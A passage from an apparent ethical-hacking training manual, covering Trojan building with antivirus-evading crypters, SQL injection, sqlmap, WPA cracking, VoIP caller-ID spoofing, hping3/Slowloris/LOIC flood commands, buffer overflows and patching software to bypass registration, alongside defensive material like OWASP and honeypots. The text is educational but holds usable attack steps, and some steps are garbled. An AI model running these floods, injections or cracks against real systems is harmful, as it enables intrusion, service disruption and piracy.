3. Connection settings used to define how the Trojan is connected
4. Server startup To define how it will sytart during boot of PC

5. Server Shield To protect your Server from being Deleted

6. Fake Messagebox- To Display a fake error message

7. Offline Keylogger To send all the keylogs to your FTP Server


8. Anti Virtualbox To disable the use of Virtualbox to run the app

9. Icon Settings To select an Icon file to disguise the application


10. Generate Server To create the server part with options for selecting the file format

Once we have created the Server part send the server is distributed by some
means and when the victim executes the Trojan, we get a reverse connection at the
specified IP address mentioned in the settings , i.e your IP address.
Now clikc on the Listen button to start listening to a particular port number

Once the connection is established, options are displayed to control the infected system from our
computer. This is how a simple Trojan is created. Since this is already available in the internet,
almost all Anti-Virus detects this as a Trojan. We will see how hackers bypass Anti-Virus Protection
and run their malicious codes in next part.
How Attacker Bypass Your Antivirus By Trojans

Anti-Virus software are bypassed by Hackers by the use of programs called Crypters . Crypters
are nothing but Programs/Tools which can change the signature of your Trojan file and /or add some
random bits and encrypt your code in such a way that the Antivirus program cannot detect it as a
virus. Most Antiviruses are signature based and if it doesnt have the signature in its database, it
cannot detect it.

Some of the common crypters are


1. Ritalin
2. Xenocode
3. PE Crypter
4. Hyperion Crypter etc.,

We will see the functioning of Ritalin Crypter. It is a very simple crypter which can modify your
code and produce a new file which is undetectable by most of the antivirus.

Security Against Trojans

1. Install a good antivirus. Free or Paid is good, but dont used cracked or pirated versions.
2. Install real-time anti-spyware protection
3. Update your Anti-virus programs daily.
4. Perform scans on your computer daily.
5. Disable autorun to prevent infection from pendrives.
6. Disable image previews if using Outlook
7. Use good anti-virus which has browser plug-ins and scans all URL's for malicious content.
8. Use Hardware based Firewall.
9. Dont click on any mail links or attachments from unknown sources or malicious users.
10. Never download software from third-party sites. Download from original website.
11. Dont use cracks or keygens which may be a virus/Trojan itself.
Module 14
Website Hacking
Authentication/Authorization Bypass
Authentication Bypass Flaw can be find in websites which jave the unsecured authorization script.

Example:

<?php
$sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND
password='" . $POST_['password'] . "'";
response = mysql_query($sql);
?>User input is not filtered here properly.

How it works ?

Instead of giving proper user name and password simply give this string 1'or'1'='1,The query
seems to be like SELECT * FROM users WHERE user='1'or'1'='1' AND
password='1'or'1'='1'Here, '1'='1' is always true,so it executes the user name and password

Method to Secure:

Use the php function mysql_real_escape_string, It changes that every of this characters: \x00, \n, \r,
\, ' replaced with a simple Backslash /

Example:

<?php
$username = mysql_real_escape_string($_POST["username"]);
$password = mysql_real_escape_string($_POST["password"]);
$sql = "SELECT * FROM users WHERE username='" . $username . "' AND password='" .
$password . "'";
$response = mysql_query($sql);
?>
SQL Injection
Sql injection is one of the most popular vulnerability.we can inject a SQL query via input
datafrom .It may leads to gain the sensitive data from the databse,modify database data,execute
administration operations on database.
Categorized SQL injection:

Poorly Filtered Strings


Incorrect Type Handling
Signature Evasion
Filter Bypassing
Blind SQL Injection

Manual SQL injection:


At first we need to find vulnerable link.we find php?id=48 at the end of the url

Put quote ( ' ), you will find some content is missing.so, the website is vulnerable to SQL
injection.
Its like php?id=48'
We need to order the columns using order by statement.we need to change the number, upto
some blank page will appear.

When we put order by 17--, its shows the blank page.so we guess this is the page to perform
our further attack.
Use UNION SELECT to find vulnerable column numbers
So,we can get table name by using the following query,but we can only one table name.
To get complete table names, use group_concat(table_name).It will display the complete
table information.

From the above information we can predict that admin credentials may be available in
admin_user table.So,we need to grab columns information from that table.instead of giving
table name directly we need to give in hex format
We got the columns of admin table
To get the column information,change string as follows.

The obtained out put is merged ,so we put separator : in hex decimal 0x3a
SQL map

sqlmap is an open source penetration testing tool.The injection process of detecting and exploiting
SQL injection flaws will be automated.it has a rich set of detection engine,database finger
printing,fetching data from the database,accesing and executing the commands.

Features:
It supports MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM
DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.

It supports injection techniques like boolean-based blind, time-based blind, error-based,


UNION query, stacked queries and out-of-band.

It supports enumerate users, password hashes, privileges, roles, databases, tables and
columns.
It executes the arbitary commands and retrive their standard output on the databse server.

To open sqlmap,Type sqlmap -u url dbs


-u :url name
--dbs: option to find database name
we got database name and additional details
To find the tables in the database :sqlmap -u url name -D database name --tables
We get the tables information,here admin is the required table.So, we need to grab column
information from the admin table.
Sqlmap -u database name -T table name --columns
The obtained column information

we need to dump the information in the columns.


Cross Site Scripting
XSS(cross site scripting) is most common web attack.It is used to execute HTML and Javascript on
the web-page.Attack can be done by submitting quieries into text boxes or URL.Cross-site scripting
carried out on websites accounted for roughly 84% of all security vulnerabilities documented by
Symantec as of 2007.

Types of XSS

Non-persistent(or) Reflective:
When the data provided by user, most commonly in HTTP query parameters or in HTML form
submissions, is used immediately by server-side scripts to parse and display a page of results for
and to that user, without properly sanitizing the request.
A reflected attack is typically delivered via email or a neutral web site. The bait is an
innocent-looking URL, pointing to a trusted site but containing the XSS vector. If the trusted site is
vulnerable to the vector, clicking the link can cause the victim's browser to execute the injected
script.

Persistent(or)Stored:
When the data provided by the attacker is saved by the server, and then permanently displayed on
"normal" pages returned to other users in the course of regular browsing, without proper HTML
escaping.This is most commonly with online message boards where users are allowed to post
HTML formatted messages for other users to read.
Module 15
Data Hiding
Steganography

Steganography is the art and science of writing hidden messages in such a way that no one apart
from the sender and intended recipient, suspects the existence of the message. It uses various
methods to hide a secret message in any other data, it may be a picture , a mp3, a pdf, a video etc.,
In the olden days, secret messages were sent in normal papers or pictures using some invisible ink,
or writing in wax and such methods. But now, sophisticated tools can hide your messages in any
files you want. It works on the principle that all files have some insignificant bits in it. So replacing
it with our secret data produces only minor changes to the picture and hence our data can be
embedded. Similar techniques are used to conceal data in various other formats. We will see some
of the methods used in steganography , and some tools which are used for that.

Following are the steps to hide data behind image

Tools used:- S-tools


**note for this lab we require 1 BMP image and a text file to hide

1. Open S-tools
2. First drag and drop image and after that text file and supply password to protect it from others

3. Right click and Save image with .bmp extension


Now data is hidden behind image.

4. Now if want to reveal the data. Drag and drop image to S-tool and Right click on that, choose
reveal
5. Supply Password and save hidden file.
Module 16
Wireless Hacking
Introduction
Cracking of wireless networks is the defeating of security devices in Wireless local-area networks.
Wireless local-area networks(WLANs) also called Wi-Fi networks are vulnerable to security
failure that wired networks. Cracking is a kind of information network attack that is similar to a
direct intrusion. There are two basic types of vulnerabilities associated with WLANs those caused
by poor configuration and those caused by weak encryption of password.

This is how happen in wireless hacking

WEP Cracking
Wired Equivalent Privacy (WEP) it is an easily cracked security algorithm for 802.11 wireless
networks. WAP introduced as part of the original 802.11 standard ratified. WAP main intention was
to provide data confidentiality comparable to that of a traditional wired network. It is recognizabke
by the key of 10 ot 26 hexadecimal digits and it was at one time widely used the first security
choice presented to users by router configuration tools.
Two methods of authentication is used with WEP Open System authentication and Shared Key
authentication. For the sake of clarity, we discuss WEP authentication in the Infrastructure mode
(that is, between a WLAN client and an Access Point). In Open System authentication, the WLAN
client need not provide its credentials to the Access Point during authentication. Any client can
authenticate with the Access Point and then attempt to associate. In effect, no authentication occurs.
Subsequently WEP keys can be used for encrypting data frames. At this point, the client must have
the correct keys.
In Shared Key authentication, the WEP key is used for authentication in a four step
challenge-response handshake:

The client sends an authentication request to the Access Point.


The Access Point replies with aclear textchallenge.
The client encrypts the challenge-text using the configured WEP key, and sends it back in
another authentication request.
The Access Point decrypts the response. If this matches the challenge-text the Access Point
sends back a positive reply.

By Using A Tool (Gerix-Wifi- Cracker) We Are Going To Crack A WPA Key :


How to start gerix-wifi-cracker tool in Bt 5r3
Applications backtrack Exploitation tools wireless exploitation tools Wlan exploitation
gerix-wifi-cracker-ng.
Select gerix-wifi-cracker-ng tools

This is how gerix wifi cracker looks.


First we need to configure the interface, click Enable/Disable monitor Mode if you wont find any
interface before you select. Now select monitor interface from interface list.
After selection of our interface the log will be created and shown to us at the bottom of the tool as
seen in the above image.
After rescan of networks we get list of available wifi networks. From the list of wifi networks select
any wifi as target.
Select Target with WPA Enable and Start sniffing and login and test for injection Success.
This will popups when we start sniffing a target.

The test of injection works like this and shows 100% completed.
Now click on WEP attacks to start attacking
Click Autoload Victim clients to load the victims mac address in to fields and also click Client
deauthentication to capture the handshake packets.
Now 3 way handshake is going on. Once its done then close the window.
Click Cracking tab and select they type of attack you wish to do. Basically select bruteforce
cracking.
Now select the path of your word list from your disk which contain more word which can break the
key.
Now click Aircrack-ng to crack the password,
Note : before cracking the password, packets number should cross 5000.

Key found in encrypted form just decrypt it or you can use as password too.
WPA2 Password Cracking :
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols
and security certification programs developed by the Wi-Fi Alliance to secure wireless computers
and networks. WPA/WPA2 defined these in response to serious weaknesses and researchers had
found in the previous system, WEP (Wired Equivalent Privacy).

WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003. The
Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more
secure and complex WPA2. WPA2 became available in 2004 and is a common shorthand for the full
IEEE 802.11i (or IEEE 802.11i-2004) standard.

Every step is same as we done in previous one just try with WPA instead of WEP.
Wireless Security Measures

Your home computer and office wireless network might be at risk and if you dont take the
necessary precautions to your wireless network, theres a possibility of encountering a bigger
problem in future. Hackers do not discriminate and they can attack any wifis where the security
leve is low. Once the you attacked all the personal information and important data will steal by
hackers from and many more in proper activities will be done from your network.
Below are some of precaution to be take to protect your wireless network access points.

o Change the default name and password. Routers come with a default username
which is normally the brand name. It is very important to change such information
once you have set up your wireless network. Having a password or a security key
also keeps unauthorized computers from accessing your wireless connection.
o
Keep your MAC address filtering option enabled. This will prevent hackers from
getting access to your internet connection as it only allows known users or devices to
gain internet access.

o Secure your network by turning on the WPA/WEP Encryption. Encryption


transforms information shared over the internet into codes that cannot be easily
decoded or understood by humans. This ensures that any data transferred online are
secured and protected.

o Access points and routers all use a network name called the SSID. Manufacturers
normally ship their products with the same SSID set. For example, the SSID for
Linksys devices is normally "linksys." True, knowing the SSID does not by itself
allow your neighbors to break into your network, but it is a start. More importantly,
when someone finds a default SSID, they see it is a poorly configured network and
are much more likely to attack it. Change the default SSID immediately when
configuring wireless security on your network.

o The Private Shared Key (PSK) mode for WPA uses a single password for all devices
that connect to the wireless network. It is intended for home use where the set of
users and devices does not change often. It is not intended for business use, yet many
companies use WPA-PSK because it is easier to get up and running than WPA
Enterprise, which requires a RADIUS server.
Module 17
Mobile Hacking
Installation Of Voip Server
Requirement:-

1.Virtual Machine with following specification


1.1.Hard Disk-10GB
1.2.RAM-256Mb
2.Trixbox
3.Any Softphone.

Step:-

1.Download trixbox CE 2.6.2 (Stable) from following link


.
http://master.dl.sourceforge.net/sourceforge/asteriskathome/trixbox-2.6.2.2.iso

Burn the image into CD.Otherwise you can use .iso

2.Start the virtual machine.You will see cool green screen of trixbox installation.Now
press ENTER to install trixbox

3.It will ask you to select the language so select the language you want use.4.It will now ask for
timezone.Please Select the Correct timezone.

5.Now it will ask for Root Password.Enter the password whatever you want and
confirmed it.Press ok
6.Installation will be started within 1 Minute and it will reformat your hard-disk and
install trixbox.
7.After installation machine will be restarted and you will see following screen.
8.At this point is asking for username and password
Username:-root
Password:-You supplied during installation.

9.If you want to change IP address enter the following command.


System-config-network

10.After assigning IP you can login to GUI.


Open your browser and enter IP.
11. Click On Switch tab.

12. After clicking switch button following screen will come.


Username:-maint
Password:-password
13.Click on PBX > PBX Settings > Extensions

14.Select Generic SIP Device . Click submit.


You need to enter following detail
1.User extension:- ( 202,302,402 and so on.)
2.Display Name:- (Enter any name you want)
3.Secret:- (Enter any name you want)
Click Submit.
15. The main task is to configure Softphone.Download Zoiper softphone from
below link.

http://www.zoiper.com/

16.Enter the password whatever you enter in the Secret field at the time of adding
user on server.

Enjoy free calling.


Voip Hacking
Caller ID Spoofing

This is one of the easiest attacks on VoIP networks. Caller ID spoofing creates a scenario where an
unknown user may impersonate a legitimate user to call other legitimate users on VoIP network. For
demonstration, lets use metasploitsxi auxiliary module named sip_invite_spoof.

Scenario:-

Step 1:- Start Your metasploit and load voip/sip_invite_spoof auxiliary module.
Step 2:-Configure the option.

In my case
Set MSG 201-------------------------------Caller ID
Set RHOSTS 192.168.0.104---------- -Victim IP Address
Set SRCADDR 192.168.0.122--------Caller IP Address

Step 3:- Auxiliary module will send a spoofed invite request to the victim

Step 4:- Victim considers it as legitimate call from other legitimate user.
Module 18
Honeypot
KFSensor

KFSensor is windows based Honeypot which is designed to attract and trap hackers by opening
weak and exploitable services. It doesnt open actual service just simulate them.

Download link - http://www.keyfocus.net/kfsensor

Configuration

1. Download application from above link.


2. Before Downloading just check your System IP address

3. Now Scan your system from any remote PC which is having proper connectivity with
your system using software called Zenmap.
** Now No ports and services are open here.
4. Now Double click on Kfsensor to install.
5. Welcome screen will come. Just click next to proceed.

6. Accept the license agreement and click nest to continue

7. Choose destination folder or else keep default and then click next to continue
8. Click next to continue.

9. Program is ready to install. Click next


10. Click on reboot now and click next to finish setup.

11. After reboot got to Start-->All Programs-->KfSensor. Right click on KfSensor and run
as administrator.
12. Kfsensor home screen will come and set up wizard will guide you to configure
Kfsensor for your machine.
13. Click on Next

14. Select only windows Port classes because we installed it on windows platform.
15. Specify domain name if not then keep it default.
16. Give E-mail address if you want to get updates On your E mail account.

17. Here keep everything default and click on next to continue.

18. Select install as system service. Click on next.


19. Click on finish to complete configuration.
20. Here you will see number of ports and services are opened that can alert an hacker
that someone has installed honeypot. To confuse him we will open only selected port
and services. To do follow the steps below

21. Click on Edit Scenario


22. Click on Edit.

23. Select the services and click on delete to delete particular service.

24. Here you can see we have opened only one service i.e. FTP which is running on port
25. Now if any hacker tries to scan your system he will find some open ports which we
open in KFsensor. But these ports are only virtual port not actual ports.
26. At Kfsensor you will get all the details that scanned your system. In this way we trap
the hackers using Kfsensor.
HoneyPot Tools
Following are common HoneyPots demanding in market.

1. KFsenor
Site: - http://www.keyfocus.net/kfsensor/

2. Honeyd
Site: - http://www.honeyd.org/

3. HoneyMonkey
Site: - http://research.microsoft.com/en-us/um/redmond/projects/strider/honeymonkey/

4. Snort
Site: - http://www.snort.org
Module 19
Buffer Overflow, DOS and DDOS
Buffer Overflow
Buffer overflows become one of the biggest security problem on the internet and modern
computing.It is the anomaly where program writing data to buffer it overruns the buffer boundary
and overwrites adjacent memory.
Buffer overflows invoked by inputs that are designed to execute code and change the program
execution.It results to erratic program behavior, including memory access errors, crash, or a breach
of system security.

The common programming languages associated with buffer overflows are c and c++ which
provide no build-in protection accessing or overwriting data.

Example :

we used a C programing code to accept data upto some size.

#include <stdio.h>
int main()
{
char buffer[30];
printf("Enter Data: ");
gets(buffer);
printf("Data entered by you%s\n", buffer);
return 0;
}
It normally displays the content which you entered while execution.

If we are going to give the data beyond the buffer size that it leads to the buffer overflow

This problem due to lack of proper checking the bound values. This problem can also find
in the folowing functions strcpy() strcat() sprintf() vsprintf() scanf() getchar() etc in c

Memory structure:

-------------------------------------------------------------------------------------------------------------
STACK Higher Memory [0xFFFFFFFF]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
HEAP
--------------------------------------------------------------------------------------------------------------
DATA
---------------------------------------------------------------------------------------------------------------
TEXT
---------------------------------- Lower Memory [0x00000000] --------------------------------------
---------------------------------------------------------------------------------------------------------------

TEXT : The area where the executable code or the program code store.It Includes 'read-only data.
In an executable file we usually have a text section. ttempt to write data in the text region will cause
a 'segmentation violation.'

DATA : The region of memory where static variables are stored. Executable file have 'data-bss
sections.The region which holds the information.

HEAP: This region of memory holds dynamic length data. This area of memory is allocated
dynamically at run time for process.

STACK: This region is used to dynamically allocate the local variables used in functions, to pass
parameters to the functions.Stack works with LIFO [last in, first out] queue concept. It means the
last object placed on the stack will be the first object removed.

RET : Saved Return Address: when a function or procedure is called ,then the system saves where
it was called from. when the function ends, it will read the return address and program return to
where is left off. This address is also known as the "saved return address"

======================================================================
BUFFER[ ] <----- 30 bytes
======================================================================
RETURN ADDRESS
======================================================================

But if the users inputs more than 30 bytes of data


Ex:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [user input]
This is how it would look in the memory..
=====================================================================
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
=====================================================================
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
=====================================================================
overflowed the space allocated for Buffer and even overwrote the Return Address program control
would not find the return address and show us an error 'segmentation violation'.

Hping
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the
ping(8) unix command.Hping supports ICMP echo requests,TCP,UDP,ICMP and RAW-IP
protocols.
Feautures:

7. Advanced port scanning


8. Network testing, using different protocols, TOS, fragmentation
9. Manual path MTU discovery
10. Advanced traceroute, under all the supported protocols
11. Remote OS fingerprinting
12. Remote uptime guessing
13. TCP/IP stacks auditing
14. hping can also be useful to analyse TCP/IP.
To open hping3 in gui ,Apllications -> Information gathering -> Live host gathering
->hping3.
The available options in hping 3, it provide somany options to craft the packets.

Flooding with sync packets,


hping3 --rand-source ip address - -flood -S -L 0 -p 80

Flooding with the UDP packets,


hping3 - -flood - -rand-source udp -p ipaddress
some more options:
hping3 --rand-source SA p <open port> <target IP> :sending SYN + ACK packets from a
random source.

hping3 --rand-source SAFRU L 0 M 0 p <port> <target> --flood :sending


SYN+ACK+FIN+RST+URG packets with TCP ack (-L) and TCP seq (-M).

hping3 --icmp --spoof <target address> <broadcast address> --flood:Flooding with ICMP
packets by spoofed IP (--spoof)

Slowris
It is the DOS attacking tool entire script is wrriten in perl wrriten by Rsnake.It supports Ipv4 and
Ipv6 versions.

Functionality:
Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent
headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly
tied up.
Install Slowloris
Get a Copy http://ha.ckers.org/slowloris/slowloris.pl
sudo apt-get install libio-socket-ssl-perl
Now you should be ready to run slowloris.pl

cd /pathto/slowloris
perl slowloris.pl -dns example.target.com
./slowloris.pl -dns www.example.com -port 80

perl slowloris.pl -dns www.example.com -port 80 -num 500 : Number of Sockets you want
to open.

perl slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

perl slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost
www.virtualhost.com

LOIC
Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-of-service attack
application, written in C#. LOIC was initially developed by Praetox Technologies.It perfom DOS
on target site by flooding the server with TCP or UDP packets with the intention of disrupting the
service

Features:

Java script based JS LOIC

Enable Dos from web browser by using http://loworbitwebcannon.blogspot.in

To run Loic ->install Loic ->install donetfx 4.0(no need if already installed ) ->click on icon
LOIC
Steps to run:

step 1:Give URL address and click on lock on

step 2:Give IP address instead of URL

step 3:Displays Ip adress of target

step 4:Choose which method you are going use for request like HTTP,TCP,UDP

step 5:you can move the cursor for chaging requesting speed

step 6:To start attack click on the button

Step 7:To stop attack click on button stop flooding


Module 20
Reverse Engineering
Introduction

It is done to retrieve the source code of a program because the source code was lost, to study how
the program performs certain operations, to improve the performance of a program, to fix a bug
(correct an error in the program when the source code is not available), to identify malicious content
in a program such as a virus or to adapt a program written for use with one microprocessor for use
with another. Reverse engineering for the purpose of copying or duplicating programs may
constitute a copyright violation. In some cases, the licensed use of software specifically prohibits
reverse engineering.
Engineerings constructed a building we break that structure on use on our own way

Assembly Language Basics

Introduction

It is the most basic programming language available for any processor. With assembly language, a
programmer works only with operations implemented directly on the physical . Assembly language
lacks high-level conveniences such as variables and functions, and it is not portable between
various families of processors. Nevertheless, assembly language is the most powerful computer
programming language available, and it gives programmers the insight required to write effective
code in high-level languages. Learning assembly language is well worth the time and effort of every
serious programmer.

Basics of Assembly Language


Assembly language statements are entered one statement per line. Each statement follows the
following format:
[label] mnemonic [operands] [;comment]

The fields in the square brackets are optional. A basic instruction has two parts, the first one is the
name of the instruction, which is to be executed, and the second are the operands or the parameters
of the command.

Example program:

global _start ;must be declared for linker (ld)


_start: ;tells linker entry point
mov edx,len ;message length
mov ecx,msg ;message to write
mov ebx,1 ;file descriptor (stdout)
mov eax,4 ;system call number (sys_write)
int 0x80 ;call kernel
mov eax,1 ;system call number (sys_exit)
int 0x80 ;call kernel
section .data
msg db 'Hello, world!', 0xa ;our dear string
len equ $ - msg ;length of our dear string
Identifying Flaws

After installing a application in to computer, normally every application asks to register with it. We
need a key are serial number to get registered with that application to activate full version and to use
more befits with usage in real time. So we need to give a serial key in to field to get activate.

Now if we try to enter some user name and some registration code we get a error like this saying
The username and serial number is not valid

This is the error message what we got from the application. Now search for the error in to the
application.

Debuggers

A debugger or debugging tool is a computer program that is used to test and debug other programs.
The code to be examined might alternatively be running on an instruction set simulator (ISS), a
technique that allows great power in its ability to halt when specific conditions are encountered but
which will typically be somewhat slower than executing the code directly on the appropriate
processor.
List of debuggers:

GNU Debugger (GDB)


Intel Debugger (IDB)
LLDB
Microsoft Visual Studio Debugger
Valgrind
WinDbg
Eclipse debugger API used in a range of IDEs: Eclipse IDE (Java) Nodeclipse (JavaScript)
Tool used

Applications Back Track Reverse engineering ollydbg.

Now go to
File and open .exe file from where it got installed to extract the Hex values in to ollydbg.

This is how the values are seen in ollyDbg. Now here search for the flaw what we got pop up when
we tried to register with users name and serial key.
Now right click and go for search for opition and All referenced text strings. Now a new window
appears.
Right click and select option search for a text. Search in the field for the error which we got while
trying to register the application, check entire Scope box and ok. After clicking ok you will find the
error in field.
After finding the messages, now double click on the flaw other window appears showing you error
message.

Bypassing & Cracking


Move upward still you get JNZ power iso. Now double click on JNZ SHORT powerISO.00456236

Now change JNP SHORT 00456236 value in to JNP SHORT 00456236 and click Assemble.

Right click go to Copy to executable option and click on All modifications and click copy to all.
Right click and Save file and copy the cracked .exe file and paste in to installed folder. Now run the
application and enter some junk in to user name field and serial number field.

After copy and replacing the exe file in to programme files now enter your registration details as
some junk as shown in above image and enter. The application says Thank you for your registration.

Cracking of a exe file is done and reverse engineering task is completed.


Counter Measures
Anti-analysis protections originally have their roots in copy-protection mechanisms used against
software pirvacy, but nowadays are also heavily used for malware and software that is concerned
about security or theft of intellectual property. Since all protections can be bro-
Ken, the aim is to render the analysis impossible, but at least to make it as hard as possible and to
hide essential data within the irrelevant. Especially for malware the winning of time is crucial to
reach maximum infection before an AntiVirus (AV) signature is available.

The different methods to protect a binary can be divided into passive and active measures. The
passive one story to disturb or complicate the static analysis approach,
while the active measurements aim at the dynamic analysis process.

Passive Protection Measures.


Active Protection Measures.
Anti Debugging.
Anti Emulation.
Anti Virtualization.
Anti Dumping.
Module 21
Pentest Methodolgy
Penetration Testing Methodology
1. Open Source Security Testing Methodology Manual (OSSTMM)
2. Information Systems Security Assessment Framework (ISSAF)
3. Open Web Application Security Project (OWASP) Top Ten
4. Web Application Security Consortium Threat Classification (WASC-TC)
5. Backtrack Based Penetration Testing

1. Open Source Security Testing Methodology Manual (OSSTMM)


Scope

The scope defines a process of collecting information on all assets operating in the target
environment

Channel

A channel determines the type of communication and interaction with these assets, which can be
physical, spectrum, and communication. All of these channels depict a unique set of security
components that has to be tested and verified during the assessment period. These components
comprise of physical security, human psychology, data networks, wireless communication medium,
and telecommunication

Index

The index is a method which is considerably useful while classifying these target assets
corresponding to their particular identifications, such as, MAC Address, and IP Address

Vector

vector concludes the direction by which an auditor can assess and analyze each functiona asset. This
whole process initiates a technical road map towards evaluating the targetenvironment thoroughly
and is known as Audit Scope. There are different forms of security testing which have been
classified under

OSSTMM methodology and their organization is presented within six standard

Security test types:

Blind: The blind testing does not require any prior knowledge about the target system. But the
target is informed before the execution of an audit scope. Ethical hacking and war gaming are
examples of blind type testing. This kind of testing is also widely accepted because of its ethical
vision of informing a target in advance.

Double blind: In double blind testing, an auditor does not require any knowledge about the target
system nor is the target informed before the test execution. Black-box auditing and penetration
testing are examples of double blind testing. Most of the security assessments today are carried out
using this strategy, thus, putting a real challenge for auditors to select the best of
breed tools and techniques in order to achieve their required goal.

Gray box: In gray box testing, an auditor holds limited knowledge about the target system and the
target is also informed before the test is executed. Vulnerability assessment is one of the basic
examples of gray box testing.

Double gray box: The double gray box testing works in a similar way to gray box testing, except
the time frame for an audit is defined and there are no channels and vectors being tested. White-box
audit is an example of double gray box testing.

Tandem: In tandem testing, the auditor holds minimum knowledge to assess the target system and
the target is also notified in advance before the test is executed. It is fairly noted that the tandem
testing is conducted thoroughly.

Crystal box and in-house audit are examples of tandem testing.

Reversal: In reversal testing, an auditor holds full knowledge about the target system and the target
will never be informed of how and when the test will be conducted. Red-teaming is an example of
reversal type testing.

2. Information Systems Security Assessment Framework (ISSAF)


The ISSAF was developed to focus on two areas of security testing, technical and managerial.
Since auditing requires a more established body to proclaim the necessary standards, its assessment
framework does include the Planning, Assessment, Treatment, Accreditation, and Maintenance
phases. Each of these phases holds generic guidelines that are effective and flexible to any
organizational structure. The output is a combination of operational activities, security initiatives,
and a complete list of vulnerabilities that may exist in the target environment. The assessment
process chooses the shortest path to reach the test deadline by analyzing its target against critical
vulnerabilities that can be exploited with minimum effort.

3. Open Web Application Security Project (OWASP) Top Ten


In order to justify top ten application security risks presented by OWASP, we have explained them
below with their short definitions, exemplary types, and preventive measures:

A1 - Injection: A malicious data input given by an attacker to execute arbitrary commands in the
context of a web server is known as injection attack. SQL, XML, and LDAP injections are some of
its well-known types. Escaping the special characters from user input can prevent the application
from malicious data injection.

A2 - Cross-Site Scripting (XSS): An application that does not properly validate the user input and
forwards those malicious strings to the web browser, which once executed may result in session
hijacking, cookie stealing, or website defacement is known as cross-site scripting (XSS). By
escaping all the untrusted meta characters based on HTML, JavaScript, or CSS output can prevent
the application from cross-site scripting attack.

A3 - Broken Authentication and Session Management: Use of insecure authentication and


session management routines may result in the hijacking of other user accounts and the predictable
session tokens. Developing a strong authentication and session management scheme can prevent
such attacks. The use of encryption, hashing, and secure data connection over SSL or TLS is highly
recommended.

A4 - Insecure Direct Object References: Providing a direct reference to the internal application
object can allow an attacker to manipulate such references and access the unauthorized data, unless
authenticated properly. This internal object can refer to a user account parameter value, filename, or
directory. Restricting each user-accessible object before validating its access control check should
ensure an authorized access to the requested object.

A5 - Cross-Site Request Forgery (CSRF): Forcing an authorized user to execute forged HTTP
requests against a vulnerable web application is called a cross-site request forgery attack. These
malicious requests are executed in terms of a legitimate user session so that they can not be
detected. Binding a unique unpredictable token to every HTTP request per user session can provide
mitigation against CSRF.

A6 - Security Misconfiguration: Sometimes using a default security configuration can leave the
application open to multiple attacks. Keeping the entire best known configuration for the deployed
application, web server, database server, operating system, code libraries, and all other application
related components is vital. This transparent application security configuration can be achieved by
introducing a repeatable process for software updates, patches, and hardened environment rules.

A7 - Insecure Cryptographic Storage: Applications that do not employ the cryptographic


protection scheme for sensitive data, such as health care information, credit card transaction,
personal information, and authentication details fall under this category. By implementing the
strong standard encryption or hashing algorithm one can assure the security of data at rest.

A8 - Failure to Restrict URL Access: Those web applications that do not check for the access
permissions based on the URL being accessed can allow an attacker to access unauthorized pages.
In order to resolve this issue, restrict the access to private URLs by implementing the proper
authentication and authorization controls, and develop a policy for specific users and roles that are
only allowed to access the highly sensitive area.

A9 - Insufficient Transport Layer Protection: Use of weak encryption algorithms, invalid


security certificates, and improper authentication controls can compromise the confidentiality and
integrity of data. This kind of application data is always vulnerable to traffic interception and
modification attacks. Security of such applications can be enhanced by implementing SSL for all
sensitive pages and configuring a valid digital certificate issued by an authorized certification
authority

A10 - Unvalidated Redirects and Forwards: There are many web applications which use dynamic
parameter to redirect or forward a user to a specific URL. An attacker can use the same strategy to
craft a malicious URL for users to be redirected to phishing or malware websites. The same attack
can also be extended by forwarding a request to access local unauthorized web pages. By simply
validating a supplied parameter value and checking the access control rights for the users making a
request can avoid illegitimate redirects and forwards.

4. Web Application Security Consortium Threat Classification


(WASC-TC)
Identifying the application security risks requires a thorough and rigorous testing procedure which
can be followed throughout the development lifecycle. WASC Threat Classification is another such
open standard for assessing the security of web applications. Similar to the OWASP standard, it is
also classified into a number of attacks and weaknesses, but addresses them in a much deeper
fashion. Practicing this black art for identification and verification of threats hanging over the Web
application requires standard terminology to be followed which can quickly adapt to the technology
environment. This is where the WASC-TC comes in very handy. The overall standard is presented
in three different views to help developers and security auditors to understand the vision of web
application security threats.

1. Enumeration View: This view is dedicated to provide the basis for web application attacks and
weaknesses. Each of these attacks and weaknesses has been discussed individually with their
concise definition, types, and examples of multiple programming platforms. Additionally, they are
inline with their unique identifier which can be useful for referencing. There are a total of 49 attacks
and weaknesses collated with a static WASC-ID number (1 to 49). It is important to note that this
numeric representation does not focus on risk severity but instead serves the purpose of referencing.

2. Development View: The development view takes the developer's panorama forward by
combining the set of attacks and weaknesses into vulnerabilities which may likely to occur at any
of three consecutive development phases. This could be a design, implementation, or deployment
phase. The design vulnerabilities are introduced when the application requirements do not fulfill the
security at the initial stage of requirements gathering. The implementation vulnerabilities occur due
to insecure coding principles and practices. And, the deployment vulnerabilities are the result of
misconfiguration of application, web server, and other external systems. Thus, the view broadens
the scope for its integration into a regular development lifecycle as a part of best practices.

3. Taxonomy Cross Reference View: Referring to a cross reference view of multiple web
application security standards which can help auditors and developers to map the terminology
presented in one standard with another.With a little more effort, the same facility can also assist in
achieving multiple standard compliances at the same time. However, in general, each application
security standard defines it own criteria to assess the applicationsfrom different angles and
measures their associated risks. Thus, each standard requires different efforts to be made to scale up
the calculation for risks and their severity levels. The WASC-TC attacks and weaknesses presented
in this category are mapped with OWASP top ten, Mitre'sCommon Weakness Enumeration (CWE),
Mitre's Common Attack Pattern Enumeration and Classification (CAPEC) and SANS-CWE Top 25
list.

5. Backtrack Based Penetration Testing

The illustration for the BackTrack testing process is also given below.

1. Target scoping

2. Information gathering

